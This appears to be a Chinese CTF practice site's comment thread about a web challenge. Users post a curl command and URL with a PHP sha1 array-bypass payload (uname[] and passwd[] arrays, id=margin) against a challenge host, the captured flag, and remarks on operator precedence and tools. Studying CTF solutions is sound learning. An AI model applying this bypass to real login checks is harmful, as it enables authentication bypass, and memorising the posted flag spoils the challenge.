霖丘生不要卷了
sha1 数组绕过
curl "http://114.67.175.224:10624/?uname[]=1&id=margin" -d "passwd[]=2" -g
数组绕过搞定
flag{dda83294530da7f5ad2e989626ab6e13}
三个参数。id用url编码;uname和passwd用数组绕过。对应上传输类型POST和GET。这道题就结束了。
数组绕过,简单的很
cao,搞错 === 和 and 的运算符优先级了,看来没理解的地方要好好看文档。
真无语啊,检查了半天payload明明没问题,结果burpsuit就是没内容,换hackbar就显示了。。。。
http://114.67.175.224:11569/?&name[]=1&id=margin passwd[]=2
...
评论
小小菜鸟啊 1天前
举报
霖丘生不要卷了
我是CTF大王 8天前
举报
sha1 数组绕过
Snngulaf 10天前
举报
curl "http://114.67.175.224:10624/?uname[]=1&id=margin" -d "passwd[]=2" -g
xiaobai568 1月前
举报
数组绕过搞定
h30014955 7月前
举报
flag{dda83294530da7f5ad2e989626ab6e13}
15614005380 8月前
举报
三个参数。id用url编码;uname和passwd用数组绕过。对应上传输类型POST和GET。这道题就结束了。
GET-lee 9月前
举报
数组绕过,简单的很
XRain 1年前
举报
cao,搞错 === 和 and 的运算符优先级了,看来没理解的地方要好好看文档。
老渡真的不懂 1年前
举报
真无语啊,检查了半天payload明明没问题,结果burpsuit就是没内容,换hackbar就显示了。。。。
xxt666 1年前
举报
http://114.67.175.224:11569/?&name[]=1&id=margin passwd[]=2